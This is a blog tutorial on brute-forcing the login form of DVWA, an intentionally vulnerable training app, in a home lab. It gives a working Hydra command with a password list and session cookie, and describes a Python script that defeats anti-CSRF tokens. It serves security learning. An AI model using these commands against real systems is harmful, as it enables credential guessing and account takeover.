So you installed Dam Vulnerable Web Applications, now what to you do. Join me as I go through Learning how Brute force works with DVWA using Hydra and Python. DVWA (Dam Vulnerable Web Application) is a framework we can use to learn about Linux exploits that we can use in common CTF challenges.
What is Brute Force
Simply put, you just put in usernames and passwords until we get the right combination. It’s possible to do some investigating first to identify if any user name can be found. For example a little research on the web can show default users for some software. For example it’s known the default user for DVWA is “admin” so I don’t need to try random users.
Set-up
System
In my previous post I discussed how to set up DVWA inside docker on my black arch system. You should have a running DVWA environment before attempting any of the below.
| 192.168.1.163 | Docker host running DVWA |
| 8082 | Port on which DVWA is running |
| 192.168.1.150 | Windows PC where I am running WSL and Firefox |
Authentication
Most of the commands we will use here will require authentication before you can attempt any commands. We can use a PHP Session ID to enable authentication.
Getting PHP Session ID
To get a session ID we will use Firefox but Chrome and Edge have the same features. First step is to open up the home page of DVWA and login in. The default login is user: admin and password: password
Once logged in you need to set the DVWA Security to low. This can be done after login by clicking on the DVWA Security tab, setting the Security Level to low and click “Submit”
Inside firefox lets open the inspect tool. You can do this by right clicking the page and select “Inspect” or use the keyboard short cut, in windows thats “ctrl + shift + c”. Once opened go to the storage tab and under “Cookies” Select the PHPSSID Cookie. The Cookie value will appear on the right side of the screen, right click and copy it.
In my case the value is “PHPSESSID:”hjqhvo1e4i14bo6hbh9ndqc7h2“. Whatever your value is keep it some where safe as you will need it in when doing some enumeration later on.
Also we can see another cookie here called “security” with the value of “low”. We need this for authentication and for setting the security level of the DVWA system.
Testing Authentication
Now you have the php session id its simple to check if it works.
First with out any authentication Cookies.
curl http://192.168.1.163:8082/vulnerabilities/brute/
No result and nothing returned. Lets now try it using our php session cookie and security level.
curl http://192.168.1.163:8082/vulnerabilities/brute/ \
-H "Cookie: security=low;PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2" \
-s | head
We pipe the command into head as there is a lot of code returned and we only want to see the top few lines.
We have now confirmed that our Authentication works and can proceed with testing the exploits.
DVWA Brute Force
Security Levels
Like the rest of the DVWA challenges, the brute force one comes with 4 security levels. The first two are ok and the third one is a big step up.
- Low, very straight forward brute force attack.
- Medium, very similar to the previous one.
- High, very different than the previous two and requires a different approach.
- Impossible, what is says.
Beating Low Security
The first DVWA Vulnerability we will look at is the Brute force one. It’s pretty straight forward. We need to supply a username and password repeatedly until we find the right one. The command we are going to use here is “hydra” I have another blog post covering the basics of Hydra you should take a look at if you are unfamiliar with it.
hydra -l admin \
-P /opt/fasttrack.txt 192.168.1.163 \
-s 8082 http-get-form "/vulnerabilities/brute/\
:username=^USER^&password=^PASS^&Login=Login\
:S=Welcome\
:H=Cookie\: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4"
Lets break down this command.
- -l admin, Hydra allows us to provide a file with list of users with the “-L” flag but in this case we already know that there is a user called “admin”
- -P /opt/fasttrack , This is file that has a list of password hydra try against.
- 192.168.1.163, IP address of the DVWA host.
- -s 8082, the port DVWA is running one.
- http-get-form, this and what follows it are what makes up the Header information to access the website.
- :S=Welcome, On successful login the Word “Welcome” will appear somewhere on the script. Kind of a grep. :F is another option we can use testing for what appears on a failed login.
- :H, this is the header section and we provide the authentication Cookie we got earlier.
And we have the password. As I go through this blog post more user names will be revealed and you can use the same process to get the passwords for them. Give it a try.
Set the security level to high
Beating Medium Security
For the Medium security Setting its the same as the Low security. Main difference is that there is some code to so slow down the brute force so it takes much longer to run. So patience is the key .
Beating High Security Level
This much more complicated affair than the previous two security levels. And so I might have even over complicated with my solution.
If you run the previous hydra command against this you will notice that it does not work. It a bit of digging with burpsuite before you find what the issue is.
Seems you need to supply a unique user token with each login attempt. Where do you get this token? If you look at the html code you can find it as a hidden value.
So a PHP SessionID, a valid unique user token, username and password are all needed for a successful login. As good as it is, hydra is not the way forward with this one.
A Python Script is the best way with dealing with this. I created one and also created a youtube video to go along with it.
Take a look at my github page for the script. The script will work on all security levels.
Basically the script takes a text file full of passwords, turns it into a list, takes that list and create a “requests session”. First it grabs the user token and then tries a username, password, user_token combo until it finally finds a combination that works.
Wrap Up
The addition of the token adds a layer of complexity that we have not encountered before and requires knowledge of python to move forward with it. This requires additional knowledge of python that I just can’t cover in this post